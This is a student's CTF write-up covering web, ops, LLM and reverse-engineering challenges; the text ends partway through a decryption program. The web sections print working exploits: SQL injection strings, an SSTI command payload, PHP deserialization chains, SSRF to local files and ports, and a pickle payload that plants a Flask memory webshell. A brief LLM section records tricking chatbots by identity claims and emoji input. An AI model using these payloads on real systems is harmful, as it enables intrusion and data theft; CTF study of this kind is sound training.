174557226633145985326629017377610499133, 105578481831185315088267357915446186040, 
275620780071666328887795273613981325091, 23435505408737317601794562472269448966, 153209223406380813663608757935808571040, 298537417505667302508269715871007454162, 203833907122687718347615710181705388877, 41923370405573382737900061813058979798, 3762696947926387653032627637114050038, 201362054098012734707571348865729525585, 285561801443127226417656620776228615886, 111526376057659222252771678197929357387, 203857473647840873587593099562928738804, 44500972779851392967974092230683443589, 131565609415497588649207556985146740667, 118140388348838985266223643241117982200, 151449885527204880099343472664885565851, 296392921256617994387220911796693904909, 171323803851876663161606688343678019752, 77152982746512263077542395226111426871, 71648764903315646849225859605038798241, 204032734481806785543119754456569617316, 6308687907566364067313782129902290691, 16601010504475415688487155708691097587, 267844409827567109183739120606590016153, 8224746302136608660764206696943998066, 66759882079234093195284745682061177129, 246382951504754280882643835151081337286, 255668159720160142170457715248631352728, 198682585307670767869381177003851088434, 52435298055396076040371814840062860322, 71487031168170283085378067681578926209, 19270201008106231446848331516948751837, 259975200953378762173082382130139147342, 100957428421542421187997144087873975651, 208596806512779765020431672051552927799, 299145970783704112359526450087000033589, 150947534399996219237186223933189906692, 2048564430495506099844799218948689248, 18962488382754079143174369765373573160, 123031997265327646442638576943887737076, 244982544573374061178705105734141424990, 146410849043938910996544914770892579969, 223289253099676841267315311685506771609, 51374350072145272462874563304717832675, 11071799523780604861063183113721965515, 64879815349665030137608387728274669513, 80407660651138778640313857555610913997, 303240361297474032656368918727922343524, 103535171867293830164396688627880762056, 80560992291681297484967629700766125368, 
143230791823232014720768325847406122476, 188716605362804777650654549500430035344, 232870220205325961834389425482865329315, 283584919111555062850512413920721407255, 206566027046056486360456937040463884619, 157265544558229360994066706355140059167, 234540100059557817987307855523008271441, 145080729935010940836509908225154438654, 87632901547252991486640361323948527297, 132851295075144433057295220850764336697, 119332580967710872282556206817561230364, 252662535367310697404410284791596079390, 116953597995893914045234747272641030589, 100249498080127826743176896590140549012, 136127222991007877469608037092253387587, 293872159333237281344632727438901916796, 188380258232793584033919525452891729603, 1610116068556601814921533488550773010, 227538093179017809788576278302184723209, 96083211912155805281570727244009758189, 177565192075026414675108774674272650977, 48610376097473152433617435307712235835, 247706157308906487216795222963091222950, 158089460554439410339817265377357657075, 242596743543458727108836420358578527964, 157838486547678450498998359338995593594, 154936428786673098370270244313756793764, 230069001282099253337070315838992422706, 302203905412042965194022309363722872023, 278925578180003228386990239779184911424, 2121847168422140085785053284950978779, 88186566913792352545205577594300112005, 127051055548524716972172930848069016819, 216775577660712694343189516378309335187, 44934779747684486400910901018161470888, 32429597712898788634301884219187226083, 219683174528279300995710495669083670544, 37001671152735870067433052249003677244, 40408367335919429215031155701333780256, 156957056705864208022145617831060134907, 180077610045061934161783737112285900966, 59357544819520045255625797086421901884, 77751400794807935281264495346525107329, 4517615764752715802675887411287287137, 76319782726782483955139757169428276003, 176009402215469456144386392247781430661, 283055695252017869386094188584670242363, 20001716567499724882317501875143788088, 125228382132280749989067609697418628387, 
144053090751393640875176862167012247830, 15289106046221987660093620422889539867, 111243866573605033251079958638430165633, 169264885994758018612038619809803723688, 11895954311759483419234457833286931577, 273147053963507607445612310063799123998, 158981773284803069491507978382595811562, 41293513794446810141896116395025053234, 57441237860743029006005815967510568612, 109171476551418034153338841133917497633, 136539712287056106151501004438585146777, 278918550892367788720071091355436733468, 211360251223022250021398148918837686812, 254351242496347083009146404917085951637, 130260153203964833202474997491055897705, 221930288825889900517852991745469270910, 66354211799382156899053592476719001842, 127898620670768976254134750731374490934, 298131830425274848646460016809595859328, 132109510144911727511061804395381822418, 210917766469026421985352121201196497206, 5441137715689271309917542693016936841, 209516950406881264617228336887254107528, 92275151703152148383106907311559718841, 46255650973652148247469464088017660080, 182628529221607295465655096378164148336, 52574278547120304143820897608762444985, 63698472804719856407197390836793525437, 30457182690865024857724004613999433676, 212073418196280214618461610817423630022, 48875930775858981513092672396243080640, 113234797533868946026347891158142991388, 256534108458875318962058222544020064164, 22522715662428558833985333846937440705, 97553118958308509177643330175409499003, 197088081433425221073434635573357125592, 157303116668734020456228309942188293059, 110316346669278795114546305726864504681, 228887397917708007004920589862367347873, 112210930213921962308944716344585917343, 95017760786235266842788931502689331157, 303479014347753799316861720146531596843, 138677197920058856282155251074088437081, 285912176726299387362893467150449209426, 120309832759140713296686339140142433386, 279125897926861811239250830750932241600, 289502053647872994218190050825294169535, 262459212837236162171047720358005836712, 290390838897912466575239533978002826151, 
292988850197951752250595007039860868400, 34796135808311610468205608686622819504, 25206338413385638687826160218013868658, 42180804482932648992176529097078580055, 195897225052351816559125785179252565465, 290060760535408066224831756224248708027, 34243626514368402883316460494646065629, 159497726968729366867935528734367549832, 267785772871046662107247674801793846921, 47342328853090920958565777290912999560, 194980176549393239742230551297786993434, 88020247887557921707284362381274951852, 255474100333005567974457204812640809071, 93324791124684170744053910877870176609, 69542826141091170218040988642070014011, 188678529221313094426441439309063681864, 56030802691247887446204447769438570825, 74312207153349149422500961216106557393, 153811406554673020809393530896156460494, 130232956128662318657579623819323546361, 241587755919930468705435097001858194189, 150548598672513907492388638742866339038, 38780469811591978249139697733603217652, 237554030153815380781978075720171312418, 96541634878634946114738393982914693394, 83284071476491638125716901346418260661, 277535192833115492238855935055373371297, 92291115416977028401374199691398676627, 105634075531674200869064066234662065605, 59669321288506854711632528171527160495, 24913178886798791108798737682436779604, 191902245938756063865405758957515936934, 200833770402179506644143905670947994664, 249327029439265065126080906281744759655, 2368715218056973901783211260781833927, 133209645820509536502329231321782644514, 170083361139958757944996287868734988169, 143242266754832252556264383809361085258, 198438133508477313319510861550461456953, 226416574016152349355240811564666677855, 131995850810926550122710727062184985075, 206211971624338783828953817981719254101, 95022339713176475801874420969255633409, 39239785273544046574575511790952158726, 6761950061835300419279903725369635970, 160849355761964483498641169767552240859, 44129081383649229398785011378026849128, 116611486899507912253396257166983831123, 102748760887182142877957834312659347601, 
100973668783270797012352094429175531207, 110548564207426762905750742091610942634, 205424582078496700107783237952155124442, 210932790939110827079725957948996247757, 54413304958149902897514912130730392489, 181315803651356180100745517014898850424, 183346938138867395962624263310328788228, 133507835720650939452036529283981720094, 244220649646693249242542702657146329679, 111814540087048948955999016117121133729, 210757262617434713384638061648414714521, 31712005436857719771604404352654183712, 299210790483067037892753875410776716305, 34216439939230284515095120240039231491, 246820219620854547856488049434101568744, 298588211282375015522910461809769779222, 53320103067319149790078933423751044737, 164977173816081040725650999609390274279, 234782977255751828939911143180631329578, 61521250269407451751766565186333346163, 119529895182262920689181379893081203421, 154588465395872896210615516764102943961, 153034255402211966905777978896125271527, 65497510688725487475002809757533544579, 76824114145168270682129892469858568031, 218064880554787781811938382300930885801, 196850060586188141836799779247809406205, 176023892018381269394229104598502170110, 32491776807255207889633110137157036238, 41150198830446315717651890670848632754, 260753023840843193587871227195221789744, 48345408122882987831052823644867513356, 80045935233531979816083287928071697883, 131878104259519592871955471048058374000, 15534379538690707223440448056318568055, 131291412522855581131329717355299310716, 37018675243998552749630837151597269431, 144343493968520204610097930388908478903, 67236444178494959708570043908346657722, 102574100831305499879105427279131095784, 249069309513964056714882166119752611668, 210718130986716991560768592011623825976, 266242407402824082344585571101593909650, 205203132247422842477137158586071965100, 301157372202750742637385626243753030679, 40886620741595313792996852647181029560, 253361171396328884567373946949359324229, 50071128101197582041162516700015376269, 106002417001877546867386840932652850816, 
224086864980106045542532841236299648038, 42103921294151508500634063253613482845, 49777138159264482913170680298952908154, 24324534484842395819609478778764950811, 204106593629836179932302789646808274058, 266707066043760482642609614924857456238, 18723835069315957900598472598907945204, 244338819469013923747256697307964210342, 36296287172854997655950896217230267111, 292888671179451539882069138267865661448, 287111415651274690627399445990831389362, 79940439572496625318602146625920961720, 288270505176661814341807462681727466925, 153921178962139214138689743179633342125, 263564317934507756965522450042219801757, 197993323684501153884855839599466707355, 72143993205715719344183507132882267579, 67511075584002491895239101559049103979, 231396344630318648781207380069016790960, 268490084177254392405211695854127631350, 45968181401712207064942095991325993181, 34472329776995578971329318400545600788, 112967316661320871429337739209994987784, 209508577387521479468956337084132598710, 194445696189141465862938111222574992064, 229942079198360020568341753187100646148, 47944382795398541172186729027517882654, 54806201653083974379270761512143387910, 93457347627015900562505045196097224001, 152033139738914238723733340538181549419, 123719026823969669345162603978875451754, 154704533151410142607151617227929824563, 32428281285686815618553795197210513625, 265229864831280807254743597731258298440, 14904705423314872103792141735779112532, 177442398230615511669857060547212895616, 144918716871520627851549439448066637518, 203019416536984157536348865479415073573, 288452420706913930307744155709559750006, 282516471994395201735206793889605510595, 150722332251745138694381051866105655391, 234504581837296595003379465512031425988, 44178766618576668748878202507789103195, 217129489675072754441642067295058817201, 245087939287551829934600756568137757979, 240954534396950014938672406581264782638]

decrypted_flag = decrypt_flag(ciphertext, p, a)
print(decrypted_flag)

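Web Penetration Testing and Auditing

Getting-Started Guide to Web Penetration Testing and Auditing

Set up the environment with phpstudy and get the flag.

Web Basics

Entrance to the Land of Flag

Open the challenge; the hint is about crawlers, which points to robots.txt. Opening it gives /webtutorEntry.php, and that page shows the flag.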

moectf{CONGr@Tu14TioN-foR-KNOwlNG-ROBOtS_txT10e7d}

ez_http

ez_http1

ez_http2

ez_http3

ez_http4

moectf{y0u-4RE_ReA1lY-re@LlY_verY_c1EVEr!!!20ed}

Warm-up Path 01: MoeCTF? Launch!

The normal flow:

ls / -> cat /flag    # the hint says it is in the environment -> run env

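Warm-up Path 02: Plain file upload

The hint is the same as in 01, so it should also be in env.

Upload a one-line webshell, then read env.

Warm-up Path 03: This is an image host

An image restriction was added. Write a one-line webshell with the extension changed to jpg, intercept the request and change jpg back to php, then run system('env'); and that's it.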

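Warm-up Path 04: A file browser

The topic tested is directory traversal. After a quick look around, the flag was not in the current directory, so I searched upward with ../ (URL encoding is needed) and found the level that contains flag; going in, it said the flag was not in that file.

Following the hint from moejail_lv1, I guessed it was under the tmp directory; the flag is in there, which gives the answer.

?path=../../../..//tmp/flag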

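Warm-up Path 05: Log in to the website

My first thought was to try brute force, then a record of an earlier SQL injection suddenly popped up below.

I tried it and it worked, using a simple truncation bypass.

a' or 1=1 #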

Warm-up Path 06: pop base mini moe

Straight to the writeup:

<?php
class A {
    private $evil='cat /flag';
    public $a;
}
class B {
    private $b= 'system';
}
$exp = new A();
$exp->a = new B();

$serialized_data = serialize($exp);
echo "?data=".urlencode($serialized_data) ;

The code here is tweaked slightly: the private in front of $a has to be changed to public, otherwise $a cannot be accessed.

Warm-up Path 07: Leaked password

This one is about Flask: get the PIN and enter the console.

>>> os.listdir()
['__pycache__', 'flag', 'app.py', 'getPIN.py', 'static', 'templates']
>>> with open('flag', 'r') as f: print(f.read().strip())
moectf{DONT_usIng-fLasK_6y_DE6UG_MOd_aNd-le4k-YOuR_p1nb}

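Static web page

This one requires capturing the traffic and looking at the responses; orz, I had been staring at the front end the whole time.

Looking at /api/get/?id=1-53 reveals the specific PHP page.

Inside is an MD5 bypass.

I originally thought of a self-bypass, but there was no way to do it.

Later, simply using a=0a, b[0a]=md5(0a) bypassed it; my thinking just hadn't come around to it.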

who’s blog?

fenjing got the answer in one go.

?id={{cycler.next.__globals__.__builtins__.__import__('os').popen('env').read()}};

ProveYourLove

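Method 1: capture the request and replay it to get the flag.

love1

love2

Method 2: if you can't do the first one, you can delete the cookie by hand and keep clicking.

Method 3: when I did it I didn't think of replaying requests; I set a breakpoint at the corresponding front-end check and bypassed it from the console. Not recommended.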

Challenge of the Land of Flag

Level 0: go straight to /flag1ab.html

Level 1: view the source to get the hint and the next level

<!--flag1: bW9lY3Rm-->
<!--下一步:/flag2hh.php-->

Level 2: as shown in the screenshot

Challenge

flag2 e0FmdEV
nextpage /flag3cad.php

Level 3:

?a=a
b=a
cookie:verify=admin

flag3: yX3RoMXN

/flag4bbc.php

Level 4:

Trigger it manually from the console, with a breakpoint set.

var event = new MouseEvent('click', {
    'view': window,
    'bubbles': true,
    'cancelable': true
});

var button = document.getElementById("scope").getElementsByTagName("button")[0];
button.id = 9; // first set its ID to 9
button.dispatchEvent(event); // manually trigger the click event

flag4: fdFVUMHJ
前往:/flag5sxr.php

Level 5:

Enter the matching content in the prompt box; in the console enter content='aaa', with a breakpoint on the corresponding code.

flag5: fSV90aDF

Level 6: ?moe=FLAG

post:moe=1

flag6: rZV9VX2t

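Level 7:

what=system('cat /f*');

This gives the flag piece: rbm93X1dlQn0=

Finally, concatenate the flag pieces from the seven levels and Base64-decode them to get the answer.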

bW9lY3Rme0FmdEVyX3RoMXNfdFVUMHJfSV90aDFrZV9VX2trbm93X1dlQn0=

moectf{AftEr_th1s_tUT0r_I_th1ke_U_kknow_WeB}

moe pop

Source code first:

<?php
class class000 {
    private $payl0ad = 0;
    protected $what;

    public function __destruct()
    {
        $this->check();
    }

    public function check()
    {
        if($this->payl0ad === 0)
        {
            die('FAILED TO ATTACK');
        }
        $a = $this->what;
        $a();
    }
}
class class001 {
    public $payl0ad;
    public $a;
    public function __invoke()
    {
        $this->a->payload = $this->payl0ad;
    }
}

class class002 {
    private $sec;
    public function __set($a, $b)
    {
        $this->$b($this->sec);
    }

    public function dangerous($whaattt)
    {
        $whaattt->evvval($this->sec);
    }

}
class class003 {
    public $mystr;
    public function evvval($str)
    {
        eval($str);
    }

    public function __tostring()
    {
        return $this->mystr;
    }
}
if(isset($_GET['data']))
{
    $a = unserialize($_GET['data']);
}
else {
    highlight_file(__FILE__);
}

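Do a simple code audit, working backwards from the end.

class003 has an eval function that can be used. Calling the dangerous function in class002 provides the link to it. To reach dangerous, assign a value to class001's payl0ad and use a to hold a new class002. To get the invoke function to run, look at class000: first set payl0ad=000 so that the check passes normally, then assign a new class001 to what.

That is the general idea. Going forward, here is the payload directly; to link the chain together, some members need to be changed to public.

exp:

$exp = new class000;
$exp->what=new class001;
$exp->what->payl0ad='dangerous';
$exp->what->a=new class002;
$exp1=new class003;
$exp1->mystr='phpinfo();';
$exp->what->a->sec = $exp1;
echo urlencode(serialize($exp));

I changed both payl0ad and sec to public. In the end the flag can be found in the phpinfo output; use ctrl+f to search for moe.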

Braving the Bronze Men Formation

😋 After typing out one piece of code myself earlier I had picked up some basics, and after an evening of typing I got this one out. I still need to practice my coding. The key point is probably using session to keep a persistent session: I didn't use session on my first attempt, and the second attempt had a logic problem in the code.

import requests
from bs4 import BeautifulSoup
import re

url = 'http://127.0.0.1:59353/'
session = requests.Session()
response = session.get(url)
post_data = {'player': "123", 'direct': "弟子明白"}
post_response = session.post(url, data=post_data)

def get_direction(number):
    directions = {
        1: "北方",
        2: "东北方",
        3: "东方",
        4: "东南方",
        5: "南方",
        6: "西南方",
        7: "西方",
        8: "西北方"
    }
    return directions.get(number, "无效的方向")

def extract(html_content):
    tag = BeautifulSoup(html_content, 'html.parser').find('h1', id='status')
    return tag.text if tag else "状态未找到"

def extract_numbers(text):
    return [int(num) for num in re.findall(r'\d+', text)]

for i in range(5):
    # extract the status text
    status_text = extract(post_response.text)
    print(f"状态: {status_text}")

    numbers = extract_numbers(status_text)
    count = len(numbers)

    if count == 1:
        ans = f"{get_direction(numbers[0])}"
    else:
        ans = ",".join([f"{get_direction(num)}一个" for num in numbers])

    print(f"方向: {ans}")

    payload = {'player': "123", 'direct': ans}
    post_response = session.post(url, data=payload)

status_text = extract(post_response.text)
print(f"新的状态: {status_text}")

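EE School_Backend

It was a while before I wrote this one up. It is actually just a simple SQL injection; I just rarely run into SQL challenges, so I'm not much good at writing them.

test@example.com' UNION SELECT null, null, null -- 

This bypasses the check and gives the flag.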
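Why the UNION payload above gets past a login check, and what stops it, as an added example that is not the challenge's code: the users table, the query shape and the function names are assumptions, and SQLite stands in for the real database.

```python
import sqlite3

# Constructed sample data; the schema is an assumption, not the challenge's.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'test@example.com', 's3cret')")
    return db


def login_vulnerable(db, email, password):
    # The input is pasted into the SQL text, so the quote inside `email`
    # closes the string literal and everything after it is parsed as SQL.
    # The trailing "-- " comments out the password comparison.
    sql = ("SELECT id, email, password FROM users "
           f"WHERE email = '{email}' AND password = '{password}'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, email, password):
    # Bound parameters are sent as data and are never parsed as SQL,
    # so the payload is just an e-mail address that matches no row.
    sql = ("SELECT id, email, password FROM users "
           "WHERE email = ? AND password = ?")
    return db.execute(sql, (email, password)).fetchone() is not None


# The payload quoted in the writeup: the UNION adds a row of NULLs, so a
# "did the query return a row?" check succeeds without a valid password.
PAYLOAD = "test@example.com' UNION SELECT null, null, null -- "


def compare(password="wrong-password"):
    db = make_db()
    return {
        "vulnerable": login_vulnerable(db, PAYLOAD, password),
        "parameterized": login_parameterized(db, PAYLOAD, password),
    }


if __name__ == "__main__":
    print(compare())
```

The `#` comment used in the earlier `a' or 1=1 #` payload is MySQL syntax, which is why only the `-- ` form is exercised here.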

ImageCloud Prelude

This should really count as SSRF: using ?url=file:///etc/passwd reads out the flag.

ImageCloud

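At first I tried an image webshell and exfiltrating command output to a VPS; the whole direction of my logic was simply wrong.

According to the hint, what was given is broken but the container is fine, so I took a closer look at the code in app2.py (which I hadn't read at the start).

From this it follows that the container actually has two ports open? Use **?url=http://127.0.0.1:xxxx/image/flag.jpg**, combined with a quick bp scan of ports 5001-6000,

which finds where flag.jpg is; the flag is on the image.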

cloud
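Both ImageCloud solves rely on the server fetching whatever `url` it is given. The check below is an added example, not code from the challenge: the function names are assumptions, the sample URLs in the comments are constructed, and the resolver is injectable so the logic can be exercised offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _resolve(host):
    """Default resolver: every address the host name maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def _is_internal(addr):
    ip = ipaddress.ip_address(addr.split("%")[0])  # drop an IPv6 scope id
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_fetch_url(url, resolve=_resolve):
    """Return (ok, reason) for a URL a server-side fetcher is asked to load."""
    parts = urlsplit(url)
    # file:///etc/passwd stops here: only web schemes are fetched.
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # IP literal in the URL
    except ValueError:
        try:
            addrs = resolve(host)  # a name: judge what it resolves to
        except OSError:
            return False, "host does not resolve"
    # http://127.0.0.1:<port>/image/flag.jpg stops here, whatever the port.
    for addr in addrs:
        if _is_internal(addr):
            return False, f"{addr} is an internal address"
    return True, "ok"


if __name__ == "__main__":
    for sample in ("file:///etc/passwd",
                   "http://127.0.0.1:5001/image/flag.jpg",
                   "http://[::1]:5001/image/flag.jpg"):
        print(sample, check_fetch_url(sample))
```

The fetcher has to connect to the address that was checked and re-run the check on every redirect; otherwise a name that resolves differently on the second lookup bypasses it.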

PetStore (reproduced after the contest)

This is a pickle challenge. When I was working on it I didn't think in the direction of a memory shell; later I asked a senior student, who told me I could just plant a 🐎 directly. For various reasons I didn't write any more until the contest ended, so this is a reproduction. Below is my own initial line of thinking.

The key code to locate is the import_pet part:

def import_pet(self, serialized_pet) -> bool:
    try:
        pet_data = base64.b64decode(serialized_pet)
        pet = pickle.loads(pet_data)
        if isinstance(pet, Pet):
            for i in self.pets:
                if i.uuid == pet.uuid:
                    return False
            self.pets.append(pet)
            return True
        return False
    except Exception as e:
        return False

def export_pet(self, pet_uuid) -> str | None:
    pet = self.get_pet(pet_uuid)
    if pet is not None:
        self.pets.remove(pet)
        serialized_pet = base64.b64encode(pickle.dumps(pet)).decode("utf-8")
        return serialized_pet
    return None

The goal is to deserialize and read env to get the flag; the Dockerfile writes it into env. The container has no outbound network access: the challenge container cannot initiate connections to external networks.

I tested that adopting a new pet by uuid works normally, then switched to __reduce__ to try to read env, but the read did not come through.

import pickle
import base64
import uuid
import os

class Pet:
    def __init__(self, name, species, uuid):
        self.name = name
        self.species = species
        self.uuid = uuid
    #def __repr__(self):
    #    return f"Pet(name={self.name}, species={self.species}, uuid={self.uuid})"
    def __reduce__(self):
        return (os.system, ("env",))
        #return eval,("__import__('os').system('env')",)

pet_uuid = str(uuid.uuid4())
print(pet_uuid)
pet = Pet("name", "species", pet_uuid)  # placeholder name and species
a = pickle.dumps(pet)
print(a)
encoded_pet = base64.b64encode(a).decode('utf-8')

print(f"Encoded Payload: {encoded_pet}")

(PS: thinking about it, printing the content into some blank file would also work, but let's just plant a memory shell properly.) Then the normal way forward is to plant a memory shell:

import pickle
import base64

class Pet:
    def __reduce__(self):
        cmd_injection = "__import__('os').popen(request.args.get('cmd')).read()"
        return eval, ("__import__('sys').modules['__main__'].__dict__['app']"
                      ".before_request_funcs.setdefault(None, []).append(lambda :" + cmd_injection + ")",)

# create an instance, serialize it with pickle, then base64-encode it
a = Pet()
b = pickle.dumps(a)
print(base64.b64encode(b).decode())

Then requesting ?cmd=env reads the flag.
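The root cause in import_pet is the order of operations: pickle.loads() runs whatever callable the blob names before the isinstance check is reached. The following added example (not the challenge's code; `PetOnlyUnpickler`, `safe_import_pet`, `record_call` and the sample pet are assumptions) uses a harmless load-time call to show that, next to an unpickler that resolves nothing except the Pet class.

```python
import base64
import io
import pickle


class Pet:
    """Stand-in for the challenge's Pet class (fields as on the page)."""
    def __init__(self, name, species, uuid):
        self.name, self.species, self.uuid = name, species, uuid


CALLS = []


def record_call(tag):
    """Harmless marker: records that unpickling invoked a callable."""
    CALLS.append(tag)


class CallOnLoad:
    """Benign object whose pickle asks the loader to call record_call()."""
    def __reduce__(self):
        return (record_call, ("ran during unpickling",))


def import_pet_as_on_page(serialized_pet):
    """Same order as the page's import_pet: loads() first, type check after."""
    try:
        pet = pickle.loads(base64.b64decode(serialized_pet))
        return isinstance(pet, Pet)
    except Exception:
        return False


class PetOnlyUnpickler(pickle.Unpickler):
    """Unpickler whose only resolvable global is the Pet class."""
    def find_class(self, module, name):
        if (module, name) == (Pet.__module__, "Pet"):
            return Pet
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_import_pet(serialized_pet):
    """Return a Pet, or None if the blob references anything but Pet."""
    try:
        data = base64.b64decode(serialized_pet, validate=True)
        pet = PetOnlyUnpickler(io.BytesIO(data)).load()
    except Exception:
        return None
    return pet if isinstance(pet, Pet) else None


def demo():
    blob = base64.b64encode(pickle.dumps(CallOnLoad())).decode()
    CALLS.clear()
    accepted = import_pet_as_on_page(blob)   # rejected, but too late
    ran_unsafe = len(CALLS)
    CALLS.clear()
    safe = safe_import_pet(blob)             # refused before any call
    ran_safe = len(CALLS)
    good = base64.b64encode(
        pickle.dumps(Pet("Mochi", "cat", "constructed-uuid"))).decode()
    return accepted, ran_unsafe, safe, ran_safe, safe_import_pet(good).name


if __name__ == "__main__":
    print(demo())
```

An allowlist in find_class narrows what a blob can reach; exchanging pets in a data-only format such as JSON removes the code path altogether.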

Re: Starting a Teaching Life at XDU from Zero (reproduced after the contest)

What confused me was how to get every student's ID and password to log in. Since it is written in Python, the encryption logic also had to be analysed, and because the QR code image is dynamic, my idea was to run one program logging in the students and another logged in on the teacher side, continuously sending requests to recognise and download the QR code so that the image stays current. I probably did let my thinking spread too far.

The idea of the code is: first log in with the teacher's account and obtain the QR code, then log out. Then log in with each student's account and use the sign-in URL obtained beforehand to complete the sign-in. Fill in the xxx fields with the corresponding values yourself.

import requests

url = 'xxx'
teacher_phone = '10000'
password = teacher_phone

QR_code_params = {
    "id": "xxx",
    "c": "xxx",
    "enc": "xxx",
    "DB_STRATEGY": "PRIMARY_KEY",
    "STRATEGY_PARA": "id"
}

# persistent session
session = requests.session()

def teacher_login():
    try:
        response = session.post(f"{url}/fanyalogin", data={
            "uname": teacher_phone,
            "password": password
        })
        response_data = response.json()
        if response_data.get('status'):
            print("Teacher logged in successfully.")
        else:
            raise Exception("Teacher login failed.")
    except Exception as e:
        print(f"Error during teacher login: {e}")
        raise

def get_student_account():
    try:
        response = session.get(f"{url}/widget/sign/pcTeaSignController/showSignInfo1")
        students = response.json().get("data", {}).get("changeUnSignList", [])
        return [student["uid"] for student in students]
    except Exception as e:
        print(f"Error fetching student account: {e}")
        return []

def student_login(phone):
    try:
        response = session.post(f"{url}/fanyalogin", data={
            "uname": str(phone),
            "password": str(phone)
        })
        return response.json().get('status', False)
    except Exception as e:
        print(f"Error during student login for {phone}: {e}")
        return False

def scan_QR():
    try:
        response = session.get(f"{url}/widget/sign/e", params=QR_code_params)
        return response.text
    except Exception as e:
        print(f"Error scanning QR code: {e}")
        return ""

def main():
    teacher_login()
    student_phones = get_student_account()

    if not student_phones:
        print("No students to process.")
        return

    successful_sign_ins = 0

    for index, phone in enumerate(student_phones, start=1):
        print(f"Processing student {phone} (#{index})...")
        if student_login(phone):
            print(f"Student {phone} logged in successfully.")
            result = scan_QR()
            print(f"Scan result for student {phone}: {result}")
            if "签到成功" in result:
                successful_sign_ins += 1
            # Clear session cookies to prevent carry-over issues
            session.cookies.clear()
        else:
            print(f"Student {phone} login failed.")

    print(f"All students processed. Total successful sign-ins: {successful_sign_ins}.")
    if successful_sign_ins == len(student_phones):
        print("All students have signed in successfully.")
    else:
        print(f"{len(student_phones) - successful_sign_ins} students failed to sign in.")

if __name__ == "__main__":
    main()

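smbms (reproduced after the contest)

I didn't look at this one during the contest. Solving it is mainly a matter of slowly debugging the SQL injection. The default user is admin, then fuzz the password with bp, which gives 1234567.

After that it is just slowly tuning sqlmap; the final command is shown in the screenshot.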

sms

Development and Operations Basics

Getting-Started Guide to Operations

find . -name "*.bak" -type f -exec rm -f {} +
find . -name "*.xml" -type f -exec sh -c 'for file; do mv -- "$file" "${file%.xml}.html"; done' _ {} +
find . -type f | while read -r file; do filename=$(basename "$file"); dir1=${filename:0:2}; dir2=${filename:2:2}; mkdir -p "$dir1/$dir2"; mv "$file" "$dir1/$dir2/$filename"; done
su toor
mv * /var/www/html/
grep 'flag' /var/log/nginx/access.log

Oh no! My libc!

Connect with xshell; a quick test shows that none of the usual commands work any more.

Use shell built-in commands:

while IFS= read -r line; do echo "$line"; done < /flag.txt

This gives the flag.

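Large Language Model Application Security

Neuro?

First answer that I am vedal, then I think I told it so in person (a sort of second confirmation, I think; I don't remember it very well).

Not an Assistant

After trying for a while, normal input was not accepted but emoji were. Thinking that flag simply means a flag, I entered 🚩 and got the flag.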

Reverse Engineering

Getting-Started Guide to Reverse Engineering

Just run the code in a C environment.

xor

A simple XOR is all it takes.

ls=[0x49, 0x4B, 0x41, 0x47, 0x50, 0x42, 0x5F, 0x41, 0x1C, 0x16, 0x46,0x10, 0x13,
    0x1C, 0x40, 9, 0x42, 0x16, 0x46, 0x1C, 9, 0x10,0x10,0x42, 0x1D, 9, 0x46, 0x15,
    0x14,0x14, 9, 0x17, 0x16, 0x14,0x41, 0x40,0x40, 0x16, 0x14, 0x47, 0x12, 0x40,
    0x14, 0x59]
s=''
for i in ls:
    s+=chr(i^0x24)  # every byte is XORed with the single key 0x24
print(s)

TEA

#include <iomanip>
#include <iostream>

void decrypt(unsigned int &v4, unsigned int &v5) {
    unsigned int delta = 0x9E3779B9; // fixed TEA constant; equals -1640531527 modulo 2^32
    unsigned int v3 = delta * 32;    // the reverse process starts from the final sum
    int v6 = 32;

    while (v6 > 0) {
        v5 -= ((v4 + v3) ^ ((v4 << 4) + 1634038898)) ^ ((v4 >> 5) + 1634038904);
        v4 -= ((v5 + v3) ^ ((v5 << 4) + 1702060386)) ^ ((v5 >> 5) + 1870148662);
        v3 -= delta; // subtract delta on each round when decrypting
        v6--;
    }
}

int main() {
    unsigned int v4 = 676078132; // ciphertext word that decrypts to the xxxxxxxx part
    unsigned int v5 = 957400408; // ciphertext word that decrypts to the yyyy and zzzz parts

    // run the decryption
    decrypt(v4, v5);

    // split out the yyyy and zzzz parts
    unsigned int v11 = (v5 >> 16) & 0xFFFF; // yyyy part
    unsigned int v9 = v5 & 0xFFFF;          // zzzz part

    // print the result
    std::cout << "xxxxxxxx = " << std::hex << v4 << std::endl;
    std::cout << "yyyy = " << std::hex << v11 << std::endl;
    std::cout << "zzzz = " << std::hex << v9 << std::endl;
    // zero-pad each field so leading zeros are not dropped from the flag
    std::cout << std::hex << std::setfill('0') << "moectf{" << std::setw(8) << v4 << "-"
              << std::setw(4) << v11 << "-" << std::setw(4) << v9 << "-9c42-caf30620caaf}" << std::endl;
    return 0;
}

upx

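First unpack it with the upx tool, then read it normally in IDA.

The flag is right there inside.

moectf{ec5390dd-f8cf-4b02-bc29-3bb0c5604c29}

upx-revenge

Unpack it manually in x64dbg using the ESP method, then open it in ida64 to get the flag.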

upx-renvenge

dynamic

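Download and open the file, press shift+f12 to open the corresponding view, and find what happened to my flag?

There is a piece of logic there; after REencrypto runs, it changes. Set a breakpoint on the what line and debug dynamically with f9 to get the flag.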

dynamic

d0tN3t

Open it in dnSpy, locate the key code, then write the decryption script:

#include <cstdint>
#include <iostream>
#include <string>
#include <vector>

int main() {
    std::vector<uint8_t> array = {
        173, 146, 161, 174, 132, 179, 187, 234, 231, 244,
        177, 161, 65, 13, 18, 12, 166, 247, 229, 207,
        125, 109, 67, 180, 230, 156, 125, 127, 182, 236,
        105, 21, 215, 148, 92, 18, 199, 137, 124, 38,
        228, 55, 62, 164
    };

    std::string flag;

    for (size_t i = 0; i < array.size(); ++i) {
        // undo the XOR with i*i and 114, then the +114, all modulo 256
        char decrypted_char = static_cast<char>((array[i] ^ (i * i)) ^ 114) - 114;
        flag += decrypted_char;
    }

    std::cout << "Decrypted Flag: " << flag << std::endl;

